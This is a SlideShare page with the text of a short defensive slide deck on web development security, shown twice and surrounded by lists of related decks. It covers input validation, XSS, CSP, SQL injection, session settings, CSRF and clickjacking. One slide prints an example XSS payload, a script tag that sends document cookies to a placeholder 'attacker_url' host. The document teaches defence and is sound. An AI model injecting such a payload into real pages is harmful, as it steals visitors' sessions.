SlideShare a Scribd company logo
1 of 18
Download to read offline
Web Development
Security
 rafaelmonteiro / web-development-security
Pillars of Information Security
Confidentiality
Integrity
Availability
 rafaelmonteiro / web-development-security
Principles
Multiple Layer Security
Consider that each layer will eventually fail
Provide the minimum amount of information
required
 rafaelmonteiro / web-development-security
Validate user input
Since HTTP requests can be manipulated client-side,
all user input must be validated.
 rafaelmonteiro / web-development-security
Protection
PHP offers the extensions ctype and filter. In
addition, most frameworks implement some sort of
data sanitization.
PHP 7+ provides type declarations that allow you to
specify the expected type of parameters.
declare(strict_types = 1);
 rafaelmonteiro / web-development-security
Cross-site scripting (XSS)
When a user-supplied script is stored and/or executed
by the application.
 rafaelmonteiro / web-development-security
Example
Assuming that an application allows input via GET
method, a malicious attacker do this injection:
<script>
(New Image()).src = "http://attacker_url/?" + escape(document.c
</script>
 rafaelmonteiro / web-development-security
Types
Stored
Non-persistent
Based on DOM
 rafaelmonteiro / web-development-security
Consequences
Cookie/session the
DOM Manipulation
Keylogger
Browser exploits
Everything JavaScript allows
 rafaelmonteiro / web-development-security
Protection
only allows access to code from
the same origin (protocol/domain/port) of the
application, while allowing access to external files (a
lib such as , for example)
Filter user input ( , , )
Escape output ( , ,
)
Apply (default-src, img-src,
script-src) -> delete inline code
Same-origin Policy
JQuery
strip_tags filter_var preg_replace
htmlspecialchars htmlentities
filter_var
Content Security Policy
 rafaelmonteiro / web-development-security
Testing the CSP
A report is created when related warnings are
generated by the application.
Content-Security-Policy-Report-Only
Report-uri /path/file.php
 rafaelmonteiro / web-development-security
SQL Injection
Protection
Do not concatenate data (parameters) with SQL
queries
Validate user input
Use prepared statements
Escape characters
 rafaelmonteiro / web-development-security
Status Management
Protection
Use HTTPS
Set secure and HttpOnly flags
Prevent XSS
Session ID
Store some distinctive user information in session
Detect session hijacking (token)
Use to hinder session the
Change
HSTS
 rafaelmonteiro / web-development-security
Policies
session.use_strict_mode = true;
session.cookie_secure = true;
session.use_only_cookies = true;
session.cookie_httponly = true;
 
Strict-Transport-Security: max-age = 86400; includeSubDomains
 rafaelmonteiro / web-development-security
Cross-site Request Forgery
(CSRF)
Caused by viruses, scam/phishing, malicious
site/redirect
Protection
Submit token
Do not use GET for operations involving data
manipulation (just a good practice, because POST
can also be manipulated)
 rafaelmonteiro / web-development-security
Clickjacking
Attacker creates fake page and through requests to
the target site (usually via iframe), takes advantage
of the user session
Protection
header('X-FRAME-OPTIONS', 'DENY'); // or SAMEORIGIN
 rafaelmonteiro / web-development-security
Tools
Arachni web scanner
Dependencies security checker
 rafaelmonteiro / web-development-security
References
OWASP
 rafaelmonteiro / web-development-security

More Related Content

What's hot

Windows 8 security eCore
Windows 8 security eCoreWindows 8 security eCore
Windows 8 security eCoreThe eCore Group
 
Top 10 security risks for mobile backend developers
Top 10 security risks for mobile backend developersTop 10 security risks for mobile backend developers
Top 10 security risks for mobile backend developersJiri Danihelka
 
How to get recover from a hacked website
How to get recover from a hacked websiteHow to get recover from a hacked website
How to get recover from a hacked websitemounika k
 
Security hardening and drown attack prevention for mobile backend developers
Security hardening and drown attack prevention for mobile backend developersSecurity hardening and drown attack prevention for mobile backend developers
Security hardening and drown attack prevention for mobile backend developersJiri Danihelka
 
Cyber security considerations for Small and Medium Businesses
Cyber security considerations for Small and Medium BusinessesCyber security considerations for Small and Medium Businesses
Cyber security considerations for Small and Medium Businessesebusinessmantra
 
Why vulners? Short story about reinventing a wheel
Why vulners? Short story about reinventing a wheelWhy vulners? Short story about reinventing a wheel
Why vulners? Short story about reinventing a wheelKirill Ermakov
 
How to avoid your website from keep getting hacked
How to avoid your website from keep getting hackedHow to avoid your website from keep getting hacked
How to avoid your website from keep getting hackedmounika k
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Sean Jackson
 
Preventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyPreventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyKsenia Peguero
 
Application Security - Myth or Fact Slides
Application Security - Myth or Fact SlidesApplication Security - Myth or Fact Slides
Application Security - Myth or Fact Slidesdfgrumpy
 
Dave Lewis - The Se7en Deadly Sins Of Web Security - Codemotion Berlin 2018
Dave Lewis - The Se7en Deadly Sins Of Web Security - Codemotion Berlin 2018Dave Lewis - The Se7en Deadly Sins Of Web Security - Codemotion Berlin 2018
Dave Lewis - The Se7en Deadly Sins Of Web Security - Codemotion Berlin 2018Codemotion
 
Mule anypointenterprisesecurity
Mule anypointenterprisesecurityMule anypointenterprisesecurity
Mule anypointenterprisesecurityhimajareddys
 
Pci compliance writing secure code
Pci compliance   writing secure codePci compliance   writing secure code
Pci compliance writing secure codeMiva
 
Vulnerability Funalitics with vulners.com
Vulnerability Funalitics with vulners.comVulnerability Funalitics with vulners.com
Vulnerability Funalitics with vulners.comKirill Ermakov
 
mod_security introduction at study2study #3
mod_security introduction at study2study #3mod_security introduction at study2study #3
mod_security introduction at study2study #3Naoya Nakazawa
 
PCI security requirements secure coding and code review 2014
PCI security requirements   secure coding and code review 2014PCI security requirements   secure coding and code review 2014
PCI security requirements secure coding and code review 2014Haitham Raik
 
Future of Web Security Opened up by CSP
Future of Web Security Opened up by CSPFuture of Web Security Opened up by CSP
Future of Web Security Opened up by CSPMuneaki Nishimura
 
10 things I’ve learnt about web application security
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application securityJames Crowley
 

What's hot (20)

Windows 8 security eCore
Windows 8 security eCoreWindows 8 security eCore
Windows 8 security eCore
 
Top 10 security risks for mobile backend developers
Top 10 security risks for mobile backend developersTop 10 security risks for mobile backend developers
Top 10 security risks for mobile backend developers
 
How to get recover from a hacked website
How to get recover from a hacked websiteHow to get recover from a hacked website
How to get recover from a hacked website
 
Security hardening and drown attack prevention for mobile backend developers
Security hardening and drown attack prevention for mobile backend developersSecurity hardening and drown attack prevention for mobile backend developers
Security hardening and drown attack prevention for mobile backend developers
 
Cyber security considerations for Small and Medium Businesses
Cyber security considerations for Small and Medium BusinessesCyber security considerations for Small and Medium Businesses
Cyber security considerations for Small and Medium Businesses
 
Why vulners? Short story about reinventing a wheel
Why vulners? Short story about reinventing a wheelWhy vulners? Short story about reinventing a wheel
Why vulners? Short story about reinventing a wheel
 
How to avoid your website from keep getting hacked
How to avoid your website from keep getting hackedHow to avoid your website from keep getting hacked
How to avoid your website from keep getting hacked
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019
 
Preventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyPreventing XSS with Content Security Policy
Preventing XSS with Content Security Policy
 
Application Security - Myth or Fact Slides
Application Security - Myth or Fact SlidesApplication Security - Myth or Fact Slides
Application Security - Myth or Fact Slides
 
Dave Lewis - The Se7en Deadly Sins Of Web Security - Codemotion Berlin 2018
Dave Lewis - The Se7en Deadly Sins Of Web Security - Codemotion Berlin 2018Dave Lewis - The Se7en Deadly Sins Of Web Security - Codemotion Berlin 2018
Dave Lewis - The Se7en Deadly Sins Of Web Security - Codemotion Berlin 2018
 
Spring Security Introduction
Spring Security IntroductionSpring Security Introduction
Spring Security Introduction
 
Mule anypointenterprisesecurity
Mule anypointenterprisesecurityMule anypointenterprisesecurity
Mule anypointenterprisesecurity
 
Pci compliance writing secure code
Pci compliance   writing secure codePci compliance   writing secure code
Pci compliance writing secure code
 
Vulnerability Funalitics with vulners.com
Vulnerability Funalitics with vulners.comVulnerability Funalitics with vulners.com
Vulnerability Funalitics with vulners.com
 
mod_security introduction at study2study #3
mod_security introduction at study2study #3mod_security introduction at study2study #3
mod_security introduction at study2study #3
 
PCI security requirements secure coding and code review 2014
PCI security requirements   secure coding and code review 2014PCI security requirements   secure coding and code review 2014
PCI security requirements secure coding and code review 2014
 
Future of Web Security Opened up by CSP
Future of Web Security Opened up by CSPFuture of Web Security Opened up by CSP
Future of Web Security Opened up by CSP
 
10 things I’ve learnt about web application security
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application security
 
Spring security
Spring securitySpring security
Spring security
 

Similar to Web Development Security

OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxFernandoVizer
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP ApplicationsAditya Mooley
 
Application Security Part 1 Threat Defense In Client Server Applications ...
Application Security   Part 1   Threat Defense In Client Server Applications ...Application Security   Part 1   Threat Defense In Client Server Applications ...
Application Security Part 1 Threat Defense In Client Server Applications ...Greg Sohl
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
HTTP_Header_Security.pdf
HTTP_Header_Security.pdfHTTP_Header_Security.pdf
HTTP_Header_Security.pdfksudhakarreddy5
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure codingHaitham Raik
 
Pentesting web applications
Pentesting web applicationsPentesting web applications
Pentesting web applicationsSatish b
 
Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Barry Dorrans
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation SecurityAman Singh
 
Implementing application security using the .net framework
Implementing application security using the .net frameworkImplementing application security using the .net framework
Implementing application security using the .net frameworkLalit Kale
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 
List of useful security related http headers
List of useful security related http headersList of useful security related http headers
List of useful security related http headers한익 주
 
DevSecOps - automating security
DevSecOps - automating securityDevSecOps - automating security
DevSecOps - automating securityJohn Staveley
 
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...Matt Raible
 
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...Matt Raible
 
Browser security
Browser securityBrowser security
Browser securityUday Anand
 

Similar to Web Development Security (20)

XSS
XSSXSS
XSS
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP Applications
 
Application Security Part 1 Threat Defense In Client Server Applications ...
Application Security   Part 1   Threat Defense In Client Server Applications ...Application Security   Part 1   Threat Defense In Client Server Applications ...
Application Security Part 1 Threat Defense In Client Server Applications ...
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
HTTP_Header_Security.pdf
HTTP_Header_Security.pdfHTTP_Header_Security.pdf
HTTP_Header_Security.pdf
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure coding
 
Pentesting web applications
Pentesting web applicationsPentesting web applications
Pentesting web applications
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
 
Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
 
Implementing application security using the .net framework
Implementing application security using the .net frameworkImplementing application security using the .net framework
Implementing application security using the .net framework
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
List of useful security related http headers
List of useful security related http headersList of useful security related http headers
List of useful security related http headers
 
DevSecOps - automating security
DevSecOps - automating securityDevSecOps - automating security
DevSecOps - automating security
 
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
 
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
 
Browser security
Browser securityBrowser security
Browser security
 
Pixels_Camp
Pixels_CampPixels_Camp
Pixels_Camp
 

Recently uploaded

Landscape Catalogue 2024 Australia-1.pdf
Landscape Catalogue 2024 Australia-1.pdfLandscape Catalogue 2024 Australia-1.pdf
Landscape Catalogue 2024 Australia-1.pdfAarwolf Industries LLC
 
Infrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platformsInfrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platformsYoss Cohen
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
QMMS Lesson 2 - Using MS Excel Formula.pdf
QMMS Lesson 2 - Using MS Excel Formula.pdfQMMS Lesson 2 - Using MS Excel Formula.pdf
QMMS Lesson 2 - Using MS Excel Formula.pdfROWELL MARQUINA
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Alkin Tezuysal
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...Nikki Chapple
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Kaya Weers
 
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesManik S Magar
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks  and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks  and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...itnewsafrica
 
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...amber724300
 
WomenInAutomation2024: AI and Automation for eveyone
WomenInAutomation2024: AI and Automation for eveyoneWomenInAutomation2024: AI and Automation for eveyone
WomenInAutomation2024: AI and Automation for eveyoneUiPathCommunity
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS:  6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS:  6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integrationmarketing932765
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...Nikki Chapple
 
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...Jeffrey Haguewood
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 

Recently uploaded (20)

Landscape Catalogue 2024 Australia-1.pdf
Landscape Catalogue 2024 Australia-1.pdfLandscape Catalogue 2024 Australia-1.pdf
Landscape Catalogue 2024 Australia-1.pdf
 
Infrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platformsInfrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platforms
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
QMMS Lesson 2 - Using MS Excel Formula.pdf
QMMS Lesson 2 - Using MS Excel Formula.pdfQMMS Lesson 2 - Using MS Excel Formula.pdf
QMMS Lesson 2 - Using MS Excel Formula.pdf
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
Microsoft 365 Copilot: How to boost your productivity with AI – Part two: Dat...
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)
 
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks  and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks  and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
 
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
 
WomenInAutomation2024: AI and Automation for eveyone
WomenInAutomation2024: AI and Automation for eveyoneWomenInAutomation2024: AI and Automation for eveyone
WomenInAutomation2024: AI and Automation for eveyone
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS:  6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS:  6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
 
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 

Web Development Security

  • 1. Web Development Security  rafaelmonteiro / web-development-security
  • 2. Pillars of Information Security Confidentiality Integrity Availability  rafaelmonteiro / web-development-security
  • 3. Principles Multiple Layer Security Consider that each layer will eventually fail Provide the minimum amount of information required  rafaelmonteiro / web-development-security
  • 4. Validate user input Since HTTP requests can be manipulated client-side, all user input must be validated.  rafaelmonteiro / web-development-security
  • 5. Protection PHP offers the extensions ctype and filter. In addition, most frameworks implement some sort of data sanitization. PHP 7+ provides type declarations that allow you to specify the expected type of parameters. declare(strict_types = 1);  rafaelmonteiro / web-development-security
  • 6. Cross-site scripting (XSS) When a user-supplied script is stored and/or executed by the application.  rafaelmonteiro / web-development-security
  • 7. Example Assuming that an application allows input via GET method, a malicious attacker do this injection: <script> (New Image()).src = "http://attacker_url/?" + escape(document.c </script>  rafaelmonteiro / web-development-security
  • 8. Types Stored Non-persistent Based on DOM  rafaelmonteiro / web-development-security
  • 9. Consequences Cookie/session the DOM Manipulation Keylogger Browser exploits Everything JavaScript allows  rafaelmonteiro / web-development-security
  • 10. Protection only allows access to code from the same origin (protocol/domain/port) of the application, while allowing access to external files (a lib such as , for example) Filter user input ( , , ) Escape output ( , , ) Apply (default-src, img-src, script-src) -> delete inline code Same-origin Policy JQuery strip_tags filter_var preg_replace htmlspecialchars htmlentities filter_var Content Security Policy  rafaelmonteiro / web-development-security
  • 11. Testing the CSP A report is created when related warnings are generated by the application. Content-Security-Policy-Report-Only Report-uri /path/file.php  rafaelmonteiro / web-development-security
  • 12. SQL Injection Protection Do not concatenate data (parameters) with SQL queries Validate user input Use prepared statements Escape characters  rafaelmonteiro / web-development-security
  • 13. Status Management Protection Use HTTPS Set secure and HttpOnly flags Prevent XSS Session ID Store some distinctive user information in session Detect session hijacking (token) Use to hinder session the Change HSTS  rafaelmonteiro / web-development-security
  • 14. Policies session.use_strict_mode = true; session.cookie_secure = true; session.use_only_cookies = true; session.cookie_httponly = true;   Strict-Transport-Security: max-age = 86400; includeSubDomains  rafaelmonteiro / web-development-security
  • 15. Cross-site Request Forgery (CSRF) Caused by viruses, scam/phishing, malicious site/redirect Protection Submit token Do not use GET for operations involving data manipulation (just a good practice, because POST can also be manipulated)  rafaelmonteiro / web-development-security
  • 16. Clickjacking Attacker creates fake page and through requests to the target site (usually via iframe), takes advantage of the user session Protection header('X-FRAME-OPTIONS', 'DENY'); // or SAMEORIGIN  rafaelmonteiro / web-development-security
  • 17. Tools Arachni web scanner Dependencies security checker  rafaelmonteiro / web-development-security
  • 18. References OWASP  rafaelmonteiro / web-development-security